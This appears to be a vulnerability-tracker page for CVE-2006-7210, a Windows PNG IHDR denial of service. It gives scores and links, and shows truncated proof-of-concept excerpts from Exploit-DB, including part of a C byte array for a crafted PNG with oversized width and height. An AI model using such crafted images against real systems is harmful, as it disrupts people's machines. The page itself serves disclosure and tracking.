CVE-2006-7210
published 2007-06-27CVE-2006-7210: Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and…
PriorityP427medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
28.36%
97.9th percentile
Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)
exploitdb·2006-08-18
CVE-2006-7210 Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)
---
// Microsoft Windows PNG IHDR block DoS PoC (2)
//
// CPU load goes to 100% until you restart explorer.exe
//
// Bug found by: Preddy (?)
//
// Compiled and tested with Windows XP SP2, Visual studio 6, no psdk
//
// Header: 89 50 4e 47 0d 0a
//
// Greets: scoper, [H]Corny, eleet aka takker01 and [...]
#include
#include
#include
#define PNG_NAME "bla.png"
char shellcode[] =
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52"
"\x00\x00\xff\xff\x00\x00\xff\xff\x08\x00\x00\x00\x00\xc3\x07\xf1"
"\x5c\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xd6\x02\x0e\x0f\x25\x12"
"\x82\xba\x97\x53\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0a\xf0"
"\x00\x00\x0a\xf0\x01\x42\xac\x34\x98\x00\x00\x00\x04\x67\x41\x4d"
"\x41\x00\x00
Exploit-DB
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)
exploitdb·2006-08-17
CVE-2006-7210 Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)
---
/*
##################################################################################
#Microsoft Windows PNG IHDR block DoS poc
#More info: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=6
#Written by Preddy
#
#don't create the poc png file on windows it won't work as it should
#when i create it on windows with activeperl or visual c it doesn't work !!??!!
#you can try if you want to..it didn't work for me because of some weird magical windows reason..
#the png header becomes: 89 50 4e 47 0d 0d
#instead of : 89 50 4e 47 0d 0a
#
#I currently have no single idea WHY it does that...
#so use linux to compile/run the script or the program
#
#http://www.team-rootshell.com
#
#Greetz to all of my friends at:
Exploit-DB
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)
exploitdb·2006-08-16
CVE-2006-7210 Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)
Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)
---
#!/usr/bin/perl
##################################################################################
#Microsoft Windows PNG IHDR block DoS poc
#More info: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=6
#Written by Preddy
#
#don't create the poc png file on windows it won't work as it should
#when i create it on windows with activeperl or visual c
#the png header becomes: 89 50 4e 47 0d 0d
#instead of : 89 50 4e 47 0d 0a
#
#I currently have no single idea WHY it does that...
#so use linux to compile/run the script or the program
#
#http://www.team-rootshell.com
#
#Greetz to all of my friends at:
#
#FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
No writeups or analysis indexed.
http://www.securityfocus.com/bid/19520http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=6https://www.exploit-db.com/exploits/2194https://www.exploit-db.com/exploits/2204https://www.exploit-db.com/exploits/2210http://www.securityfocus.com/bid/19520http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=6https://www.exploit-db.com/exploits/2194https://www.exploit-db.com/exploits/2204https://www.exploit-db.com/exploits/2210
2007-06-27
Published